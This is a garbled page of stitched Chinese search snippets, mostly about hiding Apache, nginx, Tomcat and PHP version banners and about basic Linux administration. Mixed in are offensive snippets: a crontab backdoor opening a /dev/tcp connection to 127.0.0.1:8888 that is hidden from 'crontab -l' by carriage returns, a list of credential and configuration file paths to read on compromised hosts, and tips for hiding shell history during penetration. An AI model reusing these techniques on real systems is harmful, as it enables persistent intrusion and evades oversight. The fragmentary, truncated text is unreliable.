当开启Apache服务的时候,他人可能通过F12找到你的Apache版本号,从而利用一些已知的漏洞或者零day漏洞来进行攻击。...所以为了减少一点——仅仅是一点的风险,我们可以隐藏Apache的配置 ?...编辑Apache的配置文件 vim /etc/httpd/conf/httpd.conf 添加这一行: ServerTokens prod ?...此时刷新一下网页,发现Apache的版本信息已经被隐藏了 ?...当然,也可以通过修改源码,把Apache换个nginx的马甲,这样查看你版本信息的时候会误以为你用的是nginx,给攻击者额外增加一点难度。 至于如何改马甲,网上搜了几个教程,都没有成功。
编辑Apache的配置文件 vim /etc/httpd/conf/httpd.conf 添加ServerTokens prod这一行 重启Apache服务 systemctl restart httpd
通常情况下,黑客总是喜欢通过使用我们的网站支持(解析)服务器漏洞来进行恶意攻击并获取我们的网站信息,而第一步,则是获取我们网站服务器的版本,近而缩小漏洞搜索范围,而作为一个web运维工程师,第一步则是将这些东西隐藏掉...,从而提供网站的安全系数,下面我门来说说如何在linux服务器下如何隐藏apache(httpd)服务器的版本号。...一、访问服务器查看我们的apache版本号 [root@localhost ~]# curl -I localhostHTTP/1.1 200 OKDate: Thu, 26 Apr...”的版本号; 二、通过编辑apache配置文件来实现隐藏服务版本信息 [root@localhost ~]# find / -name "httpd.conf/usr/local/apache2... # 这里不再显示版本号了Content-Type: text/html; charset=iso-8859-1 四、大功告成 重启Apache
4,339 A+ 所属分类:WEB应用 nginx 修改nginx.conf http标签 Shell server_tokens off; 1 server_tokens off; apache...: 在apache配置文件httpd.conf中,加入以下代码 Shell ServerTokens Prod ServerSignature Off 12 ServerTokens ProdServerSignature.../catalina/util vim ServerInfo.properties 修改: server.info=Apache Tomcat/7.0.52 (Ubuntu) server.number=...7.0.52.0 server.built=Jun 30 2016 01:59:37 压缩回jar包 cd /usr/local/tomcat/lib jar uvf catalina.jar org/apache...util/ServerInfo.properties 重启tomcat 123456789101112 cd /usr/local/tomcat/libunzip catalina.jarcd org/apache
大家好,又见面了,我是你们的朋友全栈君。 如何知道自己的系统使用哪个Linux内核版本?以下是在Linux终端中检查内核版本的几种方法。...如何找到Linux内核版本 1、使用uname命令查找Linux内核 uname是用于获取系统信息的Linux命令,也可以使用它来确定自己使用的是32位还是64位系统。...对于Ubuntu服务器版本,它应该是server。 uname命令与-a选项一起使用。 如果需要,这将提供更多的系统信息。 Linux –内核名称。.../version文件查找Linux内核 在Linux中,还可以在文件/proc/version中找到Linux内核信息, 只需查看此文件的内容即可: 3、使用dmesg命令查找Linux内核版本 dmesg...由于dmesg提供了很多信息,因此应该使用类似less的命令来阅读它。 但是由于我在这里只是检查Linux内核版本,因此在Linux上使用 grep 应该会提供所需的输出。
: close Content-Type: text/html; charset=UTF-8 这个时候我想隐藏apache信息还有php信息 第一步:修改httpd.conf ServerTokens...Prod#这个下面有说明 ServerSignature Off#这个是隐藏系统 ServerSignature指令允许您配置服务器端生成文档的页脚(错误信息、mod_proxy的ftp目录列表、mod_info...的输出)。...您启用这个页脚的原因主要在于处于一个代理服务器链中的时候,用户基本无法辨识出究竟是链中的哪个服务器真正产生了返回的错误信息。...X-Powered-By: PHP/5.3.3 Connection: close Content-Type: text/html; charset=UTF-8 第二步:隐藏php版本信息 修改
隐藏nginx的版本号很简单,nginx的HttpCoreModule提供了一条叫做server_tokens指令,我这要将这条指令设置为“server_tokensoff”就可以了。 ...首先访问一下,看一下现有的版本: 复制代码 root@mail~]#curl--headhttp://192.168.3.139 HTTP/1.1403Forbidden Server:...09Dec201000:02:04GMT Content-Type:text/html Content-Length:169 Connection:keep-alive 复制代码 通过访问我得到的是
,而且也没有x86版本,所以一般都用Linux来替代。...不能用的原因就在于当时的程序都已经很大了,很多古老的东西没有与时俱进,变得不再适用。 fork保留下来是个奇迹,其中多亏了写时复制的功劳。 写时复制无法继续拯救UNIX/Linux fork了。...但写时复制本身却真的是伟大的。 写时复制除了节省空间开销之外,还有一个功用,那就是 保证时刻拥有一个稳定的版本。...这一点文件系统用的比较多,比如当写一个文件时,复制一份去写,然后再将拷贝生效,如果写的过程或者拷贝生效的过程发生意外,至少还有一个原始的稳定版本。...无论是节省空间,还是为了事务一致性而浪费空间,写时拷贝的本质都可以理解为 “保留所有版本的差异” 。这是一个伟大的发明。
大家好,又见面了,我是你们的朋友全栈君。...1.找出cpu高的程序,top找不到的话,用下面命令 ps -aux --sort=-pcpu|head -10 2.杀掉相关进程 kill -9 pid 3.查看crontab是否有定时任务 4.删除相关命令
Linux下文件的隐藏属性 linux除了9个权限外,还有些隐藏属性, 使用chattr命令来设置 chattr 设置文件的隐藏属性 #chattr [+-=] [ASacdistu] 文件或目录...可避免I/O较慢的机器过度访问磁盘。 S :一般文件是异步格式写入磁盘的,如果加上S这个属性时,对文件进行任何修改,将会“同步”写入磁盘中。...c :这个属性设置之后,讲会自动将此文件压缩,在读取的时候会自动解压缩,但是在存储的时候,将会先进行压缩后再存储。...d :当dump程序被执行的时候,设置d属性将可使该文件(或目录)不会被dump备份。 i :它可以让一个文件不能被删除、改名,设置连接也无法写入或添加数据。只有root才能设置这个属性。...lsattr 显示文件隐藏属性 #lsattr [-adR] 文件或目录 参数: -a :将隐藏属性也显示出来 -d :如果接的是目录,仅列出目录本身的属性而非目录内的文件名 -R :连同子目录的数据也一并列出
-eq 0 ] ;then echo "一切准备就绪" else echo "请检查你绑定的网卡是不是vm8" fi cd ~ cd apache tar zxvf apr-1.6.2.tar.gz...二、隐藏版本信息 1、配置Apache隐藏版本信息的必要性 Apache的版本信息,透露了一定的漏洞信息,从而给网站带来安全隐患 生产环境中要配置Apache隐藏版本信息 可使用Fiddler抓包工具分析...2、配置Apache隐藏版本信息详解 将主配置文件httpd.conf以下行注释去掉 #Include conf/extra/httpd-default.conf 修改httpd-default.conf...ServerTokens Full修改为ServerTokens Prod 将ServersSignature On 修改为ServersSignature Off 重启httpd服务,访问网站,抓包测试 3、隐藏版本信息实操...没隐藏之前 ?
Lamp环境搭建与配置 知识介绍 L:linux A:apache M:mysql P:php 三个角色可以在同一台机器也可以分开(Apache和PHP要在一起) 工作模式: PHP是以模块的形式与Apache...mariadb是MySQL的一个分支,MySQL分为社区版本,企业版本,通用版本,开发版本,发行候选版本,开放测试版本,内部测试版本 安装MySQL MySQL的常用安装包:rpm,源码包,二进制免编译包...2.解压免编译包 解压二进制免编译包 [root@wslinux src]# tar -xzvf mysql-5.6.43-linux-glibc2.12-x86_64.tar.gz 将解压完成的数据移动到.../usr/local目录下,在/usr/local目录下创建mysql目录用于存放mysql的安装信息 [root@wslinux src]# mv mysql-5.6.43-linux-glibc2.12...1233 -I //无法访问 [root@wslinux extra]# curl -x192.168.200.22:80 www.wshuo.com/admin/wshuo.php -I 注:这种配置的好处在于可以针对性的安装需求来做
与Tomcat采用JK的方式整合的基础上,整合过程详见 http://www.linuxidc.com/Linux/2014-09/107338.htm 1)在workers.properties文件中添加两行...:worker.list=status(实际上是worker.list=status,tomcat)和worker.status.type=status 2)在httpd-vhosts.conf文件中的...1)修改httpd-vhosts.conf文件,在标签下新增如下内容 Options MultiViews AuthType...-c /app/apache/conf/.htpasswd admin]即可,用于生成一个包含用户admin的密码文件 同时会让你输入两次新用户admin的密码,最后通过[ls -al]就可以看到生成的密码文件了...(它是隐藏文件,需要-a才能看到) 3)修改密码 htpasswd -m .htpasswd 用户名 4)删除用户 htpasswd -D .htpasswd 用户名 5)最后重启apache就可以了
在安装apache最新版httpd-2.4.3的时候遇到各种坑。...接下来介绍详细的安装过程: (1)先在/usr/local目录下创建这四个目录: apache2 apr apr-util pcre 如果对linux命令不熟悉的猿友可以看博主的另外一篇文章...:项目部署、配置、查错常用到的Linux命令 (2)接下来: 将httpd-2.4.3.tar.gz解压到/usr/local/apache2 apr-1.4.6.tar.gz解压到/usr/local...如果对linux编辑命令不熟悉的可以阅读博主的另外一篇博客:Linux文件编辑命令详细整理 •启动Apache:/usr/local/apache2/bin/apachectl -k start •停止...启动apache成功后,打开linux的浏览器访问:http://localhost:80 博主的是阿里云服务器,所以访问地址为:http://120.25.235.171:80 访问结果: ?
Linux内核版本的变化 自从1991年9月17日,Linus Torvals正式宣布了 Linux的第一个正式版本—0.02版本,到现在,Linux的内核版本发生了一系列的变化,新旧版本之间的时间间隔是几个月甚至几个星期...从Linux诞生开始,Linux内核就从来没有停止过升级,从Linus第一次发布的0.02版本到1999年具有里程碑意义的2.2版本,一直到我们现在看到的2.4版本,都凝聚了Linux内核开发人员大量辛苦的劳动...这种Modem和一般Modem的处理方法不同,它的DSP处理并不是在硬件层次上做的,而是使用软件通过CPU实现的,因此无法在现有的Linux中配置这种Modem上网。...· 内核级的Web服务器:这种Web服务器和我们所谓的Apache用户层上的Web服务器并不冲突。...对HTTP请求首先由内核级的Web服务器进行处理,如果不能处理就将请求提交给Apache用户级Web服务器来处理。像这样的构思和实现在网络操作系统中实属一绝。
linux下历史命令通常有两大用处,一个是快速复用,另外是审计,快速复用在之前的文章linux命令行技巧中提过,有兴趣的可以去看看,今天主要说审计部分,分两部分:记录历史命令和隐藏命令行历史,分别针对运维防护及入侵渗透...,下面分别介绍 记录所有用户历史命令 原本的linux默认记录1000条历史记录,且只记录命令,完全没办法做审计,当遇到服务器入侵等情况,做审计工作时,如果你没有开启audit,或其他第三方审计工具,在通过...你还可以在这里增加用户,以及客户端IP等 隐藏你的命令行历史 相对于命令行记录,隐藏命令行历史,除了在渗透测试中使用,还有一些使用场景,比如特权命令不想被别人看到,或者比较重要的命令不希望在浏览历史命令时被误执行...这里说的不是完全意义上的禁用历史命令记录,如果你要那么做,那你直接在环境变量/etc/profile中将HISTSIZE设置为0即可 下面的几个方法是临时隐藏命令行历史 在命令前插入空格 在命令行前插入空格是最简单的方式...或者通过上下键翻找历史命令,通过Ctrl+U来清除当前行的记录 ? 不过这种方式会留个小马脚 ok,以上就是今天要介绍的linux下命令历史记录的保存及隐藏方式
路径里的root对应每个用户不同的crontab ?...隐藏crontab命令 我们清除之前的cron, 使用如下命令隐藏你的后门 (crontab-l;printf"*/60 * * * * exec 9 /dev/tcp/127.0.0.1/8888...这个后门还是存在的,应该怎么看到呢? 使用 cat-A xxx 就可以看到隐藏的后门了。 ? 原理 原理就是cat一些比如 \r 回车符 \n 换行符 \f 换页符这些符号导致了隐藏。...这里用python制作一个隐藏的sh。 cmd_h = "echo 'You forgot to check `cat -A`!'...> oops" # 隐藏 cmd_v = "echo 'You see me!'"
WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL...c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码 c:\Program Files\Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此...conf/resin.conf 查看linux系统配置的JSP虚拟主机 d:\APACHE\Apache2\confhttpd.conf C:\Program Files\mysql\my.ini C:...配置文件 /etc/rsyncd.conf //同步程序配置文件 /etc/my.cnf //mysql的配置文件 /etc/redhat-release //系统版本 /etc/issue /etc/.../conf /httpd.conf 查看linux APACHE虚拟主机配置文件 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
一、 服务器资源 服务名称:Linux服务器 IP:服务器公网ip 操作系统:CentOS 7.9 x64 二、 卸载系统自带的httpd Centos可能自带了httpd,但是版本可能会较低,执行下面的命令检测是否已经安装了...Apache的源码包,httpd.apache.org 这里下载的版本是:httpd-2.4.41.tar.gz 到apr.apache.org/下载APR源码包和AP… 这里下载的版本分别是:apr-.../configure --prefix=/usr/local/apache 安装完成后,可通过如下如下命令查询你http的版本 # cd /opt/app/apache24 # ....ip1替换为http服务器的IP地址,以上内容的所有ip2替换为需要代理Linux服务器的IP地址 再重启apache # apachectl restart 访问http://ip1:80/test...ip1替换为http服务器的IP地址,以上内容的所有ip2替换为需要代理的Linux服务器的IP地址 十二、配置 SSL 12.1、上传Apache相关SSL证书 # mkdir /etc/httpd/
大家好,又见面了,我是你们的朋友全栈君。...内核版本信息在顶层Makefile文件中 lemon@ubuntu:~/Develop/OrangePi_Lite2/lichee/linux-3.10$ vim Makefile VERSION =...如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
